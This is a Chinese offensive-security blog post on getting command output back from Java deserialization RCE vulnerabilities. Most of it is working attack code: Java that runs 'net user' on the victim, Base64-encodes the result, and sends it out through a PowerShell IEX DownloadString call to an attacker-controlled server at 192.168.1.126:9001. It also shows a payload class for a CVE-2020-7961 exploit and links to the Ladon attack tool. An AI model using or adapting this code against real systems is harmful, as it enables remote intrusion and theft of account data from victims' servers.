logo

K8哥哥

没有绝对安全的系统

JAVA反序列化漏洞命令执行回显方法

Ladon 2021/03/05

本文于 1521 天之前发表

<% Visit %>

简介

在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。

启动WEB

Ladon web 9001

JAVA执行命令

javac main.java & java main
注意:get提交换行符需换成别的字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class main
{
public static void main(String[] args)
{

Runtime runtime = Runtime.getRuntime();
try {
BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
String line=null;
StringBuffer b=new StringBuffer();
while ((line=br.readLine())!=null) {
b.append(line+" ");
}
System.out.println(b.toString());
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};

//java.lang.Runtime.getRuntime().exec(cmd).waitFor();
java.lang.Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}

}
}

使用http访问查看图片

返回多行结果

只返回whoami结果没什么问题,但是多行无法提交,原因在换行符这里 所以不要换行符
返回结果 K8飞刀 8.0之前 URL编码(UTF8)解码 下一版本Ladon需做下解析处理或POST提交

使用http访问查看图片

BASE64提交

http://192.168.1.126:9001/getbase64 提交的结果BASE64加密
http://192.168.1.126:9001/debase64 提交的base64结果解密

注意提交不要包含空格,以免Ladon无法解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
//main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Base64.Encoder;
import java.util.Base64;//jdk 1.8
public class main
{
    public static void main(String[] args)
    {
        
        Runtime runtime = Runtime.getRuntime();
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
            String line=null;
            StringBuffer b=new StringBuffer();
            while ((line=br.readLine())!=null) {
                b.append(line+" ");
            }
            System.out.println(b.toString());
            
        Encoder encoder = Base64.getEncoder();
        byte[] encode = encoder.encode(b.toString().getBytes());
        String encodeStr = new String(encode);
        System.out.println(encodeStr);
        
            //String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};
            
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/",encodeStr,"')"};


            //java.lang.Runtime.getRuntime().exec(cmd).waitFor();
            java.lang.Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {
            e.printStackTrace();
        }
        
    }
}

这样写会多出一个空格
String[] cmd = {“cmd.exe”, “/c”, “powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.126:9001/debase64/“,encodeStr,”’)”};

使用http访问查看图片

这样写就没有空格
String[] cmd = {“cmd.exe”, “/c”, “powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.126:9001/debase64/“+encodeStr,”’)”};

使用http访问查看图片

解决中文乱码

提交的base64结果使用UTF-8编码

    Encoder encoder = Base64.getEncoder();
    //byte[] encode = encoder.encode("hello".getBytes("UTF-8"));
    byte[] encode = encoder.encode(b.toString().getBytes("UTF-8"));
    String encodeStr = new String(encode);
    System.out.println(encodeStr);

使用http访问查看图片

完美回显

由于是BASE64加密提交的,所以什么符号都可以,这样我们可以把换行加上去,得到完美回显
其它漏洞回显解决方案同理,包括不仅限于WEB漏洞,本文只是用JAVA的反序列漏洞做例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
//main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Base64.Encoder;
import java.util.Base64;//jdk 1.8
public class main
{
    public static void main(String[] args)
    {
        
        Runtime runtime = Runtime.getRuntime();
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
            String line=null;
            StringBuffer b=new StringBuffer();
            while ((line=br.readLine())!=null) {
                b.append(line+"\n");
            }
            System.out.println(b.toString());
            
        Encoder encoder = Base64.getEncoder();
        byte[] encode = encoder.encode(b.toString().getBytes());
        String encodeStr = new String(encode);
        System.out.println(encodeStr);
        

String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/debase64/"+encodeStr,"')"};


            //java.lang.Runtime.getRuntime().exec(cmd).waitFor();
            java.lang.Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {
            e.printStackTrace();
        }
        
    }
}

将以上代码稍微修改一下集成到以下POC里,如CVE-2020-7961 RCE漏洞,编译成class

1
2
3
4
5
6
7
8
9
10
11
12
//LifExp.java
public class LifExp {
    static {
        try {
            String[] cmd = {"cmd.exe", "/c", "calc.exe"};
            java.lang.Runtime.getRuntime().
exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

使用http访问查看图片

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.0版本:K8小密圈

转载声明

K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈

转载声明: K8博客文章随意转载,转载请注明出处! © K8gege
Total:
Copyright © 2020 | Powered by K8gege